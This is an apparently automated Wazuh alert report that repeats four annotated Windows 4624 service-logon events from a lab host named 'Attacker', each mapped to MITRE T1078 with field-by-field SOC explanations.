data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
Rendered message: the same eventdata fields plus Microsoft's explanatory text. Worth reading once because it expands the %%NNNN codes (Impersonation Level: Impersonation, Virtual Account: No, Elevated Token: Yes) and shows the empty network fields; for pivots, use the structured fields below.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:07.494+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.494+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  43
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.432232
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:05.0009011Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43750
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:07.574+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.574+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  44
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.439568
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:05.8916950Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43752
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:07.684+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.684+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  45
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.446906
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:08.0405533Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43755
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10720
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:07.837+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.837+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  46
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.454244
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

